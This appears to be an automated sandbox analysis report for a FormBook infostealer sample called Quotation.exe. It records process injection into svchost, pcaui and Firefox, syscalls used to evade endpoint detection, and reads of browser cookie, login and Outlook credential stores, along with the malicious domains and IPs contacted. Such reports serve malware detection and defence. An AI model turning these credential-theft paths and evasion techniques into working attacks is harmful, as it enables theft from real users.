            Source: C:\Windows\SysWOW64\pcaui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Quotation.exeStatic file information: File size 1213440 > 1048576
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: pcaui.pdb source: svchost.exe, 00000001.00000003.1775441175.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775695281.000000000283C000.00000004.00000020.00020000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153400440.0000000001188000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iEbayRsPzr.exe, 00000002.00000002.4152726615.000000000071E000.00000002.00000001.01000000.00000004.sdmp, iEbayRsPzr.exe, 00000005.00000002.4152728546.000000000071E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.1709702687.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Quotation.exe, 00000000.00000003.1703252029.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715656038.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713157459.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1821700530.00000000047BF000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1819384297.0000000004601000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004970000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Quotation.exe, 00000000.00000003.1709702687.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Quotation.exe, 00000000.00000003.1703252029.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715656038.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713157459.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1821700530.00000000047BF000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1819384297.0000000004601000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004970000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: pcaui.exe, 00000003.00000002.4153023182.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2114722152.000000003451C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000003.00000002.4153023182.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2114722152.000000003451C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000001.00000003.1775441175.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775695281.000000000283C000.00000004.00000020.00020000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153400440.0000000001188000.00000004.00000020.00020000.00000000.sdmp
            Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 135A85C
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\pcaui.exeWindow / User API: threadDelayed 9824Jump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exe TID: 4080Thread sleep count: 149 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exe TID: 4080Thread sleep time: -298000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exe TID: 4080Thread sleep count: 9824 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exe TID: 4080Thread sleep time: -19648000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe TID: 4852Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe TID: 4852Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe TID: 4852Thread sleep time: -63000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe TID: 4852Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe TID: 4852Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
            Source: iEbayRsPzr.exe, 00000005.00000002.4153361634.000000000150F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
            Source: firefox.exe, 00000008.00000002.2116472423.000001B6744AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB_RP
            Source: pcaui.exe, 00000003.00000002.4153023182.0000000000ABD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\pcaui.exeThread register set: target process: 1704Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\pcaui.exeThread APC queued: target process: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Quotation.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 243B008Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: iEbayRsPzr.exe, 00000002.00000000.1731399198.0000000001710000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153559272.0000000001711000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000000.1891630175.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: iEbayRsPzr.exe, 00000002.00000000.1731399198.0000000001710000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153559272.0000000001711000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000000.1891630175.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Quotation.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: iEbayRsPzr.exe, 00000002.00000000.1731399198.0000000001710000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153559272.0000000001711000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000000.1891630175.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: iEbayRsPzr.exe, 00000002.00000000.1731399198.0000000001710000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153559272.0000000001711000.00000002.00000001.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000000.1891630175.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1807163533.0000000002350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4153859455.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4154038059.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4155924526.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807834480.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152729968.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807419459.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4153920591.0000000002D80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1807163533.0000000002350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4153859455.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4154038059.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4155924526.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807834480.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152729968.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807419459.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4153920591.0000000002D80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560309 Sample: Quotation.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 28 www.rtpterbaruwaktu3.xyz 2->28 30 www.54248711.xyz 2->30 32 17 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 Quotation.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 iEbayRsPzr.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 pcaui.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 iEbayRsPzr.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 rtpterbaruwaktu3.xyz 103.21.221.87, 49736, 80 LINKNET-ID-APLinknetASNID unknown 22->34 36 www.54248711.xyz 161.97.142.144, 50035, 50040, 50041 CONTABODE United States 22->36 38 13 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

